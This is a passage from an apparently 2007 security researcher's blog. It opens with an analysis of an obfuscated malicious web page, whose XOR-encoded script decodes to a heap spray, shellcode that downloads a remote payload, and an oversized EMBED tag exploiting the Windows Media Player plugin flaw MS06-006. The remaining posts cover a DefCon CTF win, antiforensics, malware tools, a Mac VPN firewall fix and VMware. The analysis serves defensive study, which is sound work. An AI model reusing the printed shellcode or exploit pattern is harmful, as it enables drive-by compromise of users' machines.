a2\xa1\xd6\xb6\xe6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xbc\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";

var xored_str = xor_str(plain_str, 147);

document.write(xored_str);
</script>

Which gets decoded as:


<SCRIPT>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED>


In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".

The final part of the decoded page might look familiar....if not, check out Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II.

Thursday, August 09, 2007

the H@cker Elite: UF engineers compete in Vegas

Folks around work get really stoked about our team winning which is cool. It's nice to be in the limelight but I find the need to keep reminding people that it wasn't just psifertex or myself that won CTF. It was a team effort and we couldn't have done it without having the right make up of people, personalities and technical skills.

I think that April Dudash from the Alligator did a wonderful job (article) capturing that sentiment. Thank you, April.

And, thank you, team 1@stplace and @tlas. Every one of you is incredible and I'm thankful to walk amongst you.

Sunday, August 05, 2007

1@stplace wins DefCon CTF 2 yrs in a row

After 24 hrs of competition over 3 days in Vegas, team 1@stplace took first place in the DefCon Capture the Flag contest hosted by Kenshoto. Headed up by team captain @tlas and co-captain Doc Brown (aka drb), we sifted our way through the maze of brilliant confusion weaved together by the Kenshoto guys. They are truly an amazing bunch of dedicated hackers who design the CTF challenges to take their fellow and aspiring hackers to the next level.

I am blessed to have been able to compete again with the talented 1@stplace team composed of @tlas, Doc Brown, fury, jrod, plato, psifertex, shiruken, wrffr and myself (mezzendo). @tlas provided great leadership throughout the time leading up to CTF and during the entire weekend. Teamwork, friendship and communication were key to our win.

Thank you @tlas for believing in me and picking me to be a part of this awesome experience two years in a row.

Monday, July 30, 2007

Evil Bits: Fighting Forensics

As if freelance writing with things now appearing in both Network Computing and Information Week magazines weren't keeping me busy enough, I'm now a blogger with DarkReading.com. My blog is titled "Evil Bits" and the first post is now available, "Fighting Forensics." It covers some of the current news surrounding antiforensics being released at Black Hat this week, a little history about this area of research and links to previous presentations from Black Hat. Chew up a red pill and take a read...

Monday, July 23, 2007

Microsoft Malware Removal Starter Kit

I came across this "Microsoft Malware Removal Starter Kit" Friday evening. I don' remember where I saw it, now, but it was released on July 10 and didn't get any recognition in any of the blogs that I frequent.

Basically, they've put together instructions for what I had created while at a previous position here at UF. The HelpDesk for our dept needed a way to do offline scanning and no one was capable of using a Linux Live boot CD to run ClavAV, so I created a disk with BartPE and included several useful tools such as a registry editor and CLI version of McAfee VirusScan.

While BartPE bordered on being a violation of MS' EULA, it never became a target of MS for a takedown. It's interesting that MS has now decided to leverage their WinPE for doing malware removal. Sure, they leave it up to the user to create the disk and add the tools, but they have a brain dead guide on how to do it. Maybe someone at MS said, "Hey, we use this WinPE thingie for creating images for deploying via WDS and installing Windows. I bet we could add more tools and make it even more useful." Well, they probably didn't say that, but I'm glad they didn't say something like, "How can we charge for this!"

Thursday, July 19, 2007

Addendum: Online Malware Scanners

I posted last fall about online scanners that I like to use when doing malware research. Here's a quick addition: "Anubis: Analyzing Unknown Binaries"

Anubis is excellent and much more in-depth than anything else currently available for free.

I'm back...

After much debate on whether or not to continue blogging, I decided to give it another shot and just not worry so much about the perfection that I typically seek when publishing content. I will try to be more fluid and less focused on making everything I post absolutely perfect which is what causes me to take *so very long* to put up posts and even not post because of the production effort.

So, I'm back...we'll see how it goes.

Sunday, May 20, 2007

Off to Interop in Las Vegas!

I'll be hopping on a plane with Sarah destined to Las Vegas in about 6 hours. CMP is sending me out there as a judge for the Best of Interop security category. It should be a fun and exciting experience to finally meet face-to-face with many of the vendors I've only spoken with via e-mail or on the phone. Also, Sarah and I will get to take in the many sights of Vegas and see at least one show while we are there. Of course, I do have to thank Jordan for having a baby so I could take is place on the trip!

During the day and most of the evenings, my schedule is fully booked between judges meetings, a VIP reception and wine tasting, vendor meetings, walking the expo floor, checking out the Interop labs and a poker tournament. One of the highlights is getting to meet with Kevin Mandia from Mandiant. He co-authored the first book I ever read on incident response and has assembled an excellent team at Mandiant that includes Jamie Butler and Kris Kendall. It should be interesting. I plan on getting more info on their upcoming tool called Caprica Six (any BSG fans reading this? ;-).

Wednesday, March 14, 2007

Mac OS X 10.4.9 fixes Cisco VPN client and ipfw

But, they don't mention it in their "About the Mac OS X 10.4.9 Update (delta)" page. I bring it up because this is an issue that I've been dealing with for the year and a half that I've had my 12" PowerBook G4. Everytime I connected to the VPN at work using the Cisco VPN client, I suddenly couldn't browse the web, check e-mail, etc. After digging around some logs, I found that TCP fragments were being blocked by the Mac OS X firewall (ipfw) according to /var/log/ipfw.log. The following command fix things.

sudo ipfw add 05000 allow tcp from any to any frag

So, a week ago, one of our network engineers came to Jordan who sent him on to me about a problem a big Apple user on campus was having with the VPN. I was inserted into the conversation and told them about my "fix" for the problem. At some point in the thread after discussing how normal end users could never do this, an Apple e-mail address was CC'ed.

A week later, 10.4.9 is released. I reboot this morning after the update and connected to the VPN about 15 mins ago. As I was typing the the "fix," Mac Mail alerts me that I have new mail. Huh? How did it work? I didn't put the "fix" in as a permanent rule. Let's check the ipfw rules...

02065 allow tcp from any to any frag


How nice of them to fix the problem. I checked Apple's support site to see if it was mentioned in the update...of course not! Just another silent fix from Apple. Thanks fellas!

Thursday, March 01, 2007

VMware: Record and Replay

About 3 hours before the event, I heard that VMware was going to be on-campus to recruit students. Big deal. IBM's ISS stopped by at our SIT meeting last week. Well, actually it was a big deal...and no, not because of the free pizza and soda, although I'm sure that's the only reason a fourth of the students were there. No, I was there because they were giving away free VMware Workstation licenses. You might say that VMware Server and Player are free, but they are missing some of the seriously bad@ss functionality that Workstation possesses.

For example, multiple snapshots. I REALLY wish the free server version supported this feature. I use VMware server a lot both for UF and freelance work. My Stack-o-Hack currently has four machines with Ubuntu 6.10 Server and VMware Server...but I digress.

So, at the meeting, the guy presenting talked about a new feature being released in VMware Workstation 6. It is called Record and Replay. What does it do? You hit the RECORD button and it records EVERYTHING about your virtual machine until you stop it. Of course, it takes up lots of space but it record CPU registers, memory and freaking network traffic! How wicked is that? Vulnerability researchers and exploit writers rejoice!

Take a look at the blog entry from VMware.

And, for you Intel Mac users that are testing VMware Fusion and are annoyed that snapshots are not officially supported, don't worry. Beta 2 next week will have it supported with pretty little "Take Snapshot" and "Revert to Snapshot" buttons. I saw it on a 17" Mac Book Pro that one of VMware employees had. I knew Jordan would be so excited about it, I took a picture with my phone and sent it to him!

Tuesday, February 27, 2007

Time to slurp...er, uhm, catch up!

I'll be catching up soon. Things have been busy with my family UF, NWC and DRSI. I've got several interesting entries lined up related to work, freelancing and things I've been doing with the SIT.

For now, check out this "bleeding threat" article...."Pod Slurping: The latest data threat."

When you're done reading it, take a look at the following to pages and tell me how pod slurping is the "the latest data threat." Oh wait, if you tacked on "...from 2005," then it might make better sense. Note that slurp.exe was created in June 2005.

Sep 5, 2005 - Podslurping and Bluesnarfing - The latest IT threats

Feb 20, 2006 - iPods Slurp Secrets